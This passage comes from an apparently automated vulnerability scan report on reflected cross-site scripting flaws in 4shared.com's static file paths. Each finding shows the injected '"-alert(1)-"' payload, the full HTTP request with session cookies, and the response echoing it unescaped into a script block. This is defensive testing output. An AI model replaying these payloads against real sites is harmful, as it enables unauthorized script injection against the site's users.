Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles9b65f&quot;-alert(1)-&quot;5a3a52c1156/css/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F821921AEC084A71599799BE7EB3C302.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.206. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b9ab"-alert(1)-"dee60659f4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css3b9ab&quot;-alert(1)-&quot;dee60659f4a/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2401037377E5C602B65A37F6FB87A0F2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.207. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76573"-alert(1)-"ec03b530299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles76573&quot;-alert(1)-&quot;ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A9839C8DEFBDA68BADCFD7665FEA8D0.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:52 GMT
Content-Length: 36369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();

...[SNIP]...

1.208. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e355f"-alert(1)-"c59a7821a20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/csse355f&quot;-alert(1)-&quot;c59a7821a20/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7B5D4E113620780EF4F857D96ACFA259.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:57 GMT
Content-Length: 36358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.209. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ccb7"-alert(1)-"03ea243a2a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles9ccb7&quot;-alert(1)-&quot;03ea243a2a2/js/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E38EA5308504D5C33D6DD7767A3BD57.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:31 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

1.210. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da92"-alert(1)-"7b78290c6f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/js4da92&quot;-alert(1)-&quot;7b78290c6f9/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C39C846DD17D85C176855BA695E2C4C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:36 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
func
...[SNIP]...

1.211. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4d2"-alert(1)-"5f2a71056a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundlesbb4d2&quot;-alert(1)-&quot;5f2a71056a9/js/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD429EE8057B85C86EB3CF8CBFD9A936.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:06 GMT
Content-Length: 36338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.212. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83dc7"-alert(1)-"5295142c7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/js83dc7&quot;-alert(1)-&quot;5295142c7b1/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB763FE317659EF84EDC6A27F3F97ABD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.213. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/4shFeatures.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a532a"-alert(1)-"56c404f6318 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa532a"-alert(1)-"56c404f6318/4shFeatures.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa532a&quot;-alert(1)-&quot;56c404f6318/4shFeatures.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEF9E6303AEEAD94CE76A913B1A2F00C.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa532a"-alert(1)-"56c404f6318/4shFeatures.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.214. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/4shFeatures.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf1b"-alert(1)-"8d2f34b5bc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/4shFeatures.cssfaf1b&quot;-alert(1)-&quot;8d2f34b5bc1
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C45CCF983AA74A4AF3418259238DAC27.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:19 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.215. http://static.4shared.com/css/common.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498ae"-alert(1)-"582fd7f25e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css498ae"-alert(1)-"582fd7f25e7/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css498ae&quot;-alert(1)-&quot;582fd7f25e7/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=902A375A6F87ECE1509A04F2E46DBA86.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:24 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css498ae"-alert(1)-"582fd7f25e7/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.216. http://static.4shared.com/css/common.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddd86"-alert(1)-"e7244271d61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.cssddd86"-alert(1)-"e7244271d61 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/common.cssddd86&quot;-alert(1)-&quot;e7244271d61
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E72E8FA400055E4F31C2D8E5BECF0112.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:30 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/common.cssddd86"-alert(1)-"e7244271d61";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.217. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/coolbuttons.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658a0"-alert(1)-"488f25f19da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css658a0"-alert(1)-"488f25f19da/coolbuttons.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css658a0&quot;-alert(1)-&quot;488f25f19da/coolbuttons.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=982CF7DB786472C50698080400077D8F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:14 GMT
Content-Length: 36179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css658a0"-alert(1)-"488f25f19da/coolbuttons.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.218. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/coolbuttons.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebafb"-alert(1)-"74fc1488d18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/coolbuttons.cssebafb&quot;-alert(1)-&quot;74fc1488d18
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=272DE1FC343CD7FCD18B47BB2B44D346.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
